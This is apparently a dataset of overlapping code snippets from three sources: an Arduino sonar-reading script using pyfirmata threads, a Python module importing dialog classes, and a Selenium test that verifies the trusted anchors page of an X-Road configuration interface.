text_sonar2) inicioEcho2.start()", "True: time = self.echoPino.ping() board.pass_time(0.06) #delay of 60ms -> see datasheet distance =", "same ports sonarEcho1 = board.get_pin('d:7:o') ## digital pin 7 OUTPUT sonarEcho2 = board.get_pin('d:8:o')", "define board 
print(\"Communication successfully started!\") it = util.Iterator(board) it.start() ## Note: Echo and", "started!\") it = util.Iterator(board) it.start() ## Note: Echo and Trigger pins connected to", "-> see datasheet distance = ping_time_to_distance(time) print(f\"{self.text}\".format(time, distance)) ##Sonar 1: port 7 text_sonar1", "= board.get_pin('d:7:o') ## digital pin 7 OUTPUT sonarEcho2 = board.get_pin('d:8:o') ## digital pin", "distance: {1}cm\" inicioEcho1 = Echo(sonarEcho1, text_sonar1) inicioEcho1.start() ##Sonar 2: port 8 text_sonar2 =", "def __init__ (self, echoPino, text:str=None): Thread.__init__(self) self.echoPino = echoPino self.text = text def", "ports sonarEcho1 = board.get_pin('d:7:o') ## digital pin 7 OUTPUT sonarEcho2 = board.get_pin('d:8:o') ##", "Echo(Thread): def __init__ (self, echoPino, text:str=None): Thread.__init__(self) self.echoPino = echoPino self.text = text", "of 60ms -> see datasheet distance = ping_time_to_distance(time) print(f\"{self.text}\".format(time, distance)) ##Sonar 1: port", "echoPino self.text = text def run(self): while True: time = self.echoPino.ping() board.pass_time(0.06) #delay", "board.get_pin('d:8:o') ## digital pin 8 OUTPUT time.sleep(1) ### End set pins class Echo(Thread):", "self.echoPino.ping() board.pass_time(0.06) #delay of 60ms -> see datasheet distance = ping_time_to_distance(time) print(f\"{self.text}\".format(time, distance))", "time.sleep(1) ### End set pins class Echo(Thread): def __init__ (self, echoPino, text:str=None): Thread.__init__(self)", "pin configuration board = Arduino() # or Arduino(port) define board print(\"Communication successfully started!\")", "7 text_sonar1 = \"sonar1: Time: {0}ms, distance: {1}cm\" inicioEcho1 = Echo(sonarEcho1, text_sonar1) inicioEcho1.start()", "\"sonar1: Time: {0}ms, distance: {1}cm\" inicioEcho1 = Echo(sonarEcho1, text_sonar1) inicioEcho1.start() ##Sonar 2: port" ]
[ "CompoManagerDialog from .outputs_manager_dialog import OutputsManagerDialog from .project_manager_dialog import ProjectManagerDialog from .settings_dialog import SettingsDialog", "# -*- coding: utf-8 -*- from .comp_manager_dialog import CompoManagerDialog from .outputs_manager_dialog import OutputsManagerDialog", "-*- coding: utf-8 -*- from .comp_manager_dialog import CompoManagerDialog from .outputs_manager_dialog import OutputsManagerDialog from", "-*- from .comp_manager_dialog import CompoManagerDialog from .outputs_manager_dialog import OutputsManagerDialog from .project_manager_dialog import ProjectManagerDialog", "utf-8 -*- from .comp_manager_dialog import CompoManagerDialog from .outputs_manager_dialog import OutputsManagerDialog from .project_manager_dialog import", "from .comp_manager_dialog import CompoManagerDialog from .outputs_manager_dialog import OutputsManagerDialog from .project_manager_dialog import ProjectManagerDialog from", "import CompoManagerDialog from .outputs_manager_dialog import OutputsManagerDialog from .project_manager_dialog import ProjectManagerDialog from .settings_dialog import", ".comp_manager_dialog import CompoManagerDialog from .outputs_manager_dialog import OutputsManagerDialog from .project_manager_dialog import ProjectManagerDialog from .settings_dialog", "coding: utf-8 -*- from .comp_manager_dialog import CompoManagerDialog from .outputs_manager_dialog import OutputsManagerDialog from .project_manager_dialog" ]
[ "trusted anchors') self.log('FED_02 2. The instance identifier of the X-Road instance the trusted", "Open \"Trusted anchors\" tab') self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery() self.log('FED_01 2. System displays trusted anchors')", "ANCHOR_HASH_REGEX, GENERATED_AT_REGEX def test_view_trusted_anchors(self): def view_trusted_anchors(): self.log('Open global configuration view') self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01", "= get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX, generated_at)) self.log('FED_02 The following user action options are displayed') self.log('FED_02", "\"Download a trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DOWNLOAD_BTN_XPATH,", "GENERATED_AT_REGEX def test_view_trusted_anchors(self): def view_trusted_anchors(): self.log('Open global configuration view') self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01 1.", "The following user action options are displayed') self.log('FED_02 \"Upload a trusted anchor\" button", "TRUSTED_ANCHORS_TAB_CSS from view_models.sidebar import GLOBAL_CONFIGURATION_CSS from view_models.trusted_anchor import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID, \\ DOWNLOAD_BTN_XPATH,", "from view_models.trusted_anchor import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID, \\ DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH, ANCHOR_HASH, ANCHOR_HASH_REGEX, GENERATED_AT_REGEX def", "anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DELETE_BTN_XPATH, multiple=True))) > 0)", "\"Upload a trusted anchor\" button is visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02 \"Download a trusted anchor\"", "import GLOBAL_CONFIGURATION_CSS from 
view_models.trusted_anchor import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID, \\ DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH, ANCHOR_HASH, ANCHOR_HASH_REGEX,", "following user action options are displayed') self.log('FED_02 \"Upload a trusted anchor\" button is", "filter(lambda x: x.size['height'] > 0, self.by_css(ANCHOR_HASH, multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX, hash)) self.log('FED_02 2. The generation", "<gh_stars>1-10 import re from selenium.webdriver.common.by import By from tests.xroad_cs_upload_trusted_anchor.upload_trusted_anchor import get_generated_at from view_models.global_configuration", "self.wait_jquery() self.log('FED_01 2. System displays trusted anchors') self.log('FED_02 2. The instance identifier of", "generated_at = get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX, generated_at)) self.log('FED_02 The following user action options are displayed')", "is visible') generated_at = get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX, generated_at)) self.log('FED_02 The following user action options", "instance the trusted anchor ' 'originates from is visible') self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02 2.", "x: x.size['height'] > 0, self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True))) > 0) self.log('FED_02 \"Delete a trusted anchor\"", "GLOBAL_CONFIGURATION_CSS from view_models.trusted_anchor import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID, \\ DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH, ANCHOR_HASH, ANCHOR_HASH_REGEX, GENERATED_AT_REGEX", "view') self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01 1. 
Open \"Trusted anchors\" tab') self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery() self.log('FED_01", "trusted anchor ' 'originates from is visible') self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02 2. The SHA-224", "0) self.log('FED_02 \"Delete a trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] >", "configuration view') self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01 1. Open \"Trusted anchors\" tab') self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery()", "tests.xroad_cs_upload_trusted_anchor.upload_trusted_anchor import get_generated_at from view_models.global_configuration import TRUSTED_ANCHORS_TAB_CSS from view_models.sidebar import GLOBAL_CONFIGURATION_CSS from view_models.trusted_anchor", "view_trusted_anchors(): self.log('Open global configuration view') self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01 1. Open \"Trusted anchors\" tab')", "the trusted anchor file is visible') hash = filter(lambda x: x.size['height'] > 0,", "visible') hash = filter(lambda x: x.size['height'] > 0, self.by_css(ANCHOR_HASH, multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX, hash)) self.log('FED_02", "action options are displayed') self.log('FED_02 \"Upload a trusted anchor\" button is visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID))", "element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery() self.log('FED_01 2. System displays trusted anchors') self.log('FED_02 2. 
The instance identifier", "and time (UTC) of the trusted anchor file is visible') generated_at = get_generated_at(self)", "button is visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02 \"Download a trusted anchor\" button is visible') self.is_true(len(filter(lambda", "multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX, hash)) self.log('FED_02 2. The generation date and time (UTC) of the", "view_models.trusted_anchor import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID, \\ DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH, ANCHOR_HASH, ANCHOR_HASH_REGEX, GENERATED_AT_REGEX def test_view_trusted_anchors(self):", "import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID, \\ DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH, ANCHOR_HASH, ANCHOR_HASH_REGEX, GENERATED_AT_REGEX def test_view_trusted_anchors(self): def", "The instance identifier of the X-Road instance the trusted anchor ' 'originates from", "tab') self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery() self.log('FED_01 2. System displays trusted anchors') self.log('FED_02 2. The", "view_models.sidebar import GLOBAL_CONFIGURATION_CSS from view_models.trusted_anchor import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID, \\ DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH, ANCHOR_HASH,", "element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02 2. The SHA-224 hash value of the trusted anchor file is", "INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID, \\ DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH, ANCHOR_HASH, ANCHOR_HASH_REGEX, GENERATED_AT_REGEX def test_view_trusted_anchors(self): def view_trusted_anchors(): self.log('Open", "\"Trusted anchors\" tab') self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery() self.log('FED_01 2. 
System displays trusted anchors') self.log('FED_02", "anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True))) > 0)", "1. Open \"Trusted anchors\" tab') self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery() self.log('FED_01 2. System displays trusted", "'originates from is visible') self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02 2. The SHA-224 hash value of", "button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True))) > 0) self.log('FED_02", "is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DELETE_BTN_XPATH, multiple=True))) > 0) return view_trusted_anchors", "from is visible') self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02 2. The SHA-224 hash value of the", "self.log('FED_01 2. System displays trusted anchors') self.log('FED_02 2. The instance identifier of the", "anchors') self.log('FED_02 2. 
The instance identifier of the X-Road instance the trusted anchor", "self.log('FED_02 \"Delete a trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0,", "is visible') hash = filter(lambda x: x.size['height'] > 0, self.by_css(ANCHOR_HASH, multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX, hash))", "trusted anchor\" button is visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02 \"Download a trusted anchor\" button is", "TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID, \\ DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH, ANCHOR_HASH, ANCHOR_HASH_REGEX, GENERATED_AT_REGEX def test_view_trusted_anchors(self): def view_trusted_anchors():", "trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True))) >", "import re from selenium.webdriver.common.by import By from tests.xroad_cs_upload_trusted_anchor.upload_trusted_anchor import get_generated_at from view_models.global_configuration import", "of the trusted anchor file is visible') hash = filter(lambda x: x.size['height'] >", "instance identifier of the X-Road instance the trusted anchor ' 'originates from is", "= filter(lambda x: x.size['height'] > 0, self.by_css(ANCHOR_HASH, multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX, hash)) self.log('FED_02 2. The", "self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02 \"Download a trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] >", "global configuration view') self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01 1. Open \"Trusted anchors\" tab') self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click()", "self.is_true(re.match(ANCHOR_HASH_REGEX, hash)) self.log('FED_02 2. 
The generation date and time (UTC) of the trusted", "The generation date and time (UTC) of the trusted anchor file is visible')", "\\ DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH, ANCHOR_HASH, ANCHOR_HASH_REGEX, GENERATED_AT_REGEX def test_view_trusted_anchors(self): def view_trusted_anchors(): self.log('Open global configuration", "self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02 2. The SHA-224 hash value of the trusted anchor file", "time (UTC) of the trusted anchor file is visible') generated_at = get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX,", "visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True))) > 0) self.log('FED_02 \"Delete a", "of the X-Road instance the trusted anchor ' 'originates from is visible') self.wait_until_visible(type=By.XPATH,", "is visible') self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02 2. 
The SHA-224 hash value of the trusted", "self.log('FED_02 The following user action options are displayed') self.log('FED_02 \"Upload a trusted anchor\"", "The SHA-224 hash value of the trusted anchor file is visible') hash =", "> 0, self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True))) > 0) self.log('FED_02 \"Delete a trusted anchor\" button is", "of the trusted anchor file is visible') generated_at = get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX, generated_at)) self.log('FED_02", "displayed') self.log('FED_02 \"Upload a trusted anchor\" button is visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02 \"Download a", "anchor\" button is visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02 \"Download a trusted anchor\" button is visible')", "a trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DELETE_BTN_XPATH, multiple=True)))", "from view_models.sidebar import GLOBAL_CONFIGURATION_CSS from view_models.trusted_anchor import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID, \\ DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH,", "0, self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True))) > 0) self.log('FED_02 \"Delete a trusted anchor\" button is visible')", "2. The generation date and time (UTC) of the trusted anchor file is", "date and time (UTC) of the trusted anchor file is visible') generated_at =", "the trusted anchor file is visible') generated_at = get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX, generated_at)) self.log('FED_02 The", "hash value of the trusted anchor file is visible') hash = filter(lambda x:", "def view_trusted_anchors(): self.log('Open global configuration view') self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01 1. 
Open \"Trusted anchors\"", "> 0) self.log('FED_02 \"Delete a trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height']", "from tests.xroad_cs_upload_trusted_anchor.upload_trusted_anchor import get_generated_at from view_models.global_configuration import TRUSTED_ANCHORS_TAB_CSS from view_models.sidebar import GLOBAL_CONFIGURATION_CSS from", "a trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True)))", "button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DELETE_BTN_XPATH, multiple=True))) > 0) return", "from selenium.webdriver.common.by import By from tests.xroad_cs_upload_trusted_anchor.upload_trusted_anchor import get_generated_at from view_models.global_configuration import TRUSTED_ANCHORS_TAB_CSS from", "self.log('FED_02 \"Download a trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0,", "self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01 1. Open \"Trusted anchors\" tab') self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery() self.log('FED_01 2.", "self.log('FED_01 1. Open \"Trusted anchors\" tab') self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery() self.log('FED_01 2. System displays", "value of the trusted anchor file is visible') hash = filter(lambda x: x.size['height']", "self.is_true(re.match(GENERATED_AT_REGEX, generated_at)) self.log('FED_02 The following user action options are displayed') self.log('FED_02 \"Upload a", "element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01 1. Open \"Trusted anchors\" tab') self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery() self.log('FED_01 2. 
System", "x.size['height'] > 0, self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True))) > 0) self.log('FED_02 \"Delete a trusted anchor\" button", "get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX, generated_at)) self.log('FED_02 The following user action options are displayed') self.log('FED_02 \"Upload", "def test_view_trusted_anchors(self): def view_trusted_anchors(): self.log('Open global configuration view') self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01 1. Open", "self.log('Open global configuration view') self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01 1. Open \"Trusted anchors\" tab') self.wait_until_visible(type=By.CSS_SELECTOR,", "' 'originates from is visible') self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02 2. The SHA-224 hash value", "x.size['height'] > 0, self.by_css(ANCHOR_HASH, multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX, hash)) self.log('FED_02 2. The generation date and", "self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery() self.log('FED_01 2. System displays trusted anchors') self.log('FED_02 2. The instance", "0, self.by_css(ANCHOR_HASH, multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX, hash)) self.log('FED_02 2. The generation date and time (UTC)", "file is visible') hash = filter(lambda x: x.size['height'] > 0, self.by_css(ANCHOR_HASH, multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX,", "anchor ' 'originates from is visible') self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02 2. The SHA-224 hash", "SHA-224 hash value of the trusted anchor file is visible') hash = filter(lambda", "hash)) self.log('FED_02 2. 
The generation date and time (UTC) of the trusted anchor", "hash = filter(lambda x: x.size['height'] > 0, self.by_css(ANCHOR_HASH, multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX, hash)) self.log('FED_02 2.", "a trusted anchor\" button is visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02 \"Download a trusted anchor\" button", "view_models.global_configuration import TRUSTED_ANCHORS_TAB_CSS from view_models.sidebar import GLOBAL_CONFIGURATION_CSS from view_models.trusted_anchor import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID,", "generation date and time (UTC) of the trusted anchor file is visible') generated_at", "trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DELETE_BTN_XPATH, multiple=True))) >", "anchors\" tab') self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery() self.log('FED_01 2. System displays trusted anchors') self.log('FED_02 2.", "trusted anchor file is visible') generated_at = get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX, generated_at)) self.log('FED_02 The following", "identifier of the X-Road instance the trusted anchor ' 'originates from is visible')", "selenium.webdriver.common.by import By from tests.xroad_cs_upload_trusted_anchor.upload_trusted_anchor import get_generated_at from view_models.global_configuration import TRUSTED_ANCHORS_TAB_CSS from view_models.sidebar", "displays trusted anchors') self.log('FED_02 2. The instance identifier of the X-Road instance the", "the X-Road instance the trusted anchor ' 'originates from is visible') self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER))", "2. 
The SHA-224 hash value of the trusted anchor file is visible') hash", "anchor file is visible') generated_at = get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX, generated_at)) self.log('FED_02 The following user", "user action options are displayed') self.log('FED_02 \"Upload a trusted anchor\" button is visible')", "import By from tests.xroad_cs_upload_trusted_anchor.upload_trusted_anchor import get_generated_at from view_models.global_configuration import TRUSTED_ANCHORS_TAB_CSS from view_models.sidebar import", "By from tests.xroad_cs_upload_trusted_anchor.upload_trusted_anchor import get_generated_at from view_models.global_configuration import TRUSTED_ANCHORS_TAB_CSS from view_models.sidebar import GLOBAL_CONFIGURATION_CSS", "visible') self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02 2. The SHA-224 hash value of the trusted anchor", "self.by_css(ANCHOR_HASH, multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX, hash)) self.log('FED_02 2. The generation date and time (UTC) of", "self.log('FED_02 2. The generation date and time (UTC) of the trusted anchor file", "import TRUSTED_ANCHORS_TAB_CSS from view_models.sidebar import GLOBAL_CONFIGURATION_CSS from view_models.trusted_anchor import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID, \\", "visible') generated_at = get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX, generated_at)) self.log('FED_02 The following user action options are", "self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True))) > 0) self.log('FED_02 \"Delete a trusted anchor\" button is visible') self.is_true(len(filter(lambda", "System displays trusted anchors') self.log('FED_02 2. 
The instance identifier of the X-Road instance", "DELETE_BTN_XPATH, ANCHOR_HASH, ANCHOR_HASH_REGEX, GENERATED_AT_REGEX def test_view_trusted_anchors(self): def view_trusted_anchors(): self.log('Open global configuration view') self.wait_until_visible(type=By.CSS_SELECTOR,", "multiple=True))) > 0) self.log('FED_02 \"Delete a trusted anchor\" button is visible') self.is_true(len(filter(lambda x:", "self.log('FED_02 2. The SHA-224 hash value of the trusted anchor file is visible')", "import get_generated_at from view_models.global_configuration import TRUSTED_ANCHORS_TAB_CSS from view_models.sidebar import GLOBAL_CONFIGURATION_CSS from view_models.trusted_anchor import", "UPLOAD_ANCHOR_BTN_ID, \\ DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH, ANCHOR_HASH, ANCHOR_HASH_REGEX, GENERATED_AT_REGEX def test_view_trusted_anchors(self): def view_trusted_anchors(): self.log('Open global", "are displayed') self.log('FED_02 \"Upload a trusted anchor\" button is visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02 \"Download", "from view_models.global_configuration import TRUSTED_ANCHORS_TAB_CSS from view_models.sidebar import GLOBAL_CONFIGURATION_CSS from view_models.trusted_anchor import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER,", "DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH, ANCHOR_HASH, ANCHOR_HASH_REGEX, GENERATED_AT_REGEX def test_view_trusted_anchors(self): def view_trusted_anchors(): self.log('Open global configuration view')", "get_generated_at from view_models.global_configuration import TRUSTED_ANCHORS_TAB_CSS from view_models.sidebar import GLOBAL_CONFIGURATION_CSS from view_models.trusted_anchor import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH,", "2. 
The instance identifier of the X-Road instance the trusted anchor ' 'originates", "re from selenium.webdriver.common.by import By from tests.xroad_cs_upload_trusted_anchor.upload_trusted_anchor import get_generated_at from view_models.global_configuration import TRUSTED_ANCHORS_TAB_CSS", "visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02 \"Download a trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height']", "(UTC) of the trusted anchor file is visible') generated_at = get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX, generated_at))", "> 0, self.by_css(ANCHOR_HASH, multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX, hash)) self.log('FED_02 2. The generation date and time", "options are displayed') self.log('FED_02 \"Upload a trusted anchor\" button is visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02", "is visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02 \"Download a trusted anchor\" button is visible') self.is_true(len(filter(lambda x:", "is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True))) > 0) self.log('FED_02 \"Delete", "X-Road instance the trusted anchor ' 'originates from is visible') self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02", "the trusted anchor ' 'originates from is visible') self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02 2. The", "self.log('FED_02 2. 
The instance identifier of the X-Road instance the trusted anchor '", "file is visible') generated_at = get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX, generated_at)) self.log('FED_02 The following user action", "\"Delete a trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DELETE_BTN_XPATH,", "generated_at)) self.log('FED_02 The following user action options are displayed') self.log('FED_02 \"Upload a trusted", "trusted anchor file is visible') hash = filter(lambda x: x.size['height'] > 0, self.by_css(ANCHOR_HASH,", "self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True))) > 0) self.log('FED_02 \"Delete a trusted", "self.log('FED_02 \"Upload a trusted anchor\" button is visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02 \"Download a trusted", "ANCHOR_HASH, ANCHOR_HASH_REGEX, GENERATED_AT_REGEX def test_view_trusted_anchors(self): def view_trusted_anchors(): self.log('Open global configuration view') self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click()", "2. System displays trusted anchors') self.log('FED_02 2. The instance identifier of the X-Road", "x: x.size['height'] > 0, self.by_css(ANCHOR_HASH, multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX, hash)) self.log('FED_02 2. The generation date", "anchor file is visible') hash = filter(lambda x: x.size['height'] > 0, self.by_css(ANCHOR_HASH, multiple=True))[0].text", "test_view_trusted_anchors(self): def view_trusted_anchors(): self.log('Open global configuration view') self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01 1. Open \"Trusted" ]
